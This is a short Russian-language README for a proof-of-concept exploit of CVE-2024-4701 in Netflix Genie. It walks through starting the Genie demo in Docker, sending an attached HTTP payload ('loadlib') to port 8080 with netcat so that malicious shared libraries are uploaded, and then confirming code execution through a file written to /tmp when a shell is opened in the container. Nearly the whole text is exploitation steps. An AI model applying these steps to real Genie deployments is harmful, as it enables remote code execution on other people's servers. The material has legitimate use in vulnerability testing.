
PoC для CVE-2024-4701
POC для CVE-2024-4701
Загрузите docker-файл genie из https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml или из этого репозитория
запустите
docker-compose up
Загрузите прикрепленный HTTP payload loadlib
Выполните следующую команду
nc -w 5 localhost 8080 < loadlib
Возможно, вам нужно установить netcat ( nc )
Это отправит полезный груз (payload) в приложение genie, запущенное в docker, которое загрузит файлы pe.so и ld.so.upload.
Затем войдите в docker-контейнер genie-app
docker exec -it genie_demo_app_4.3.0 /bin/bash
Сам процесс входа в систему запускает выполнение вредоносной библиотеки, поэтому просто выполните
ls /tmp/
Чтобы увидеть файл command.out, записанный на диск.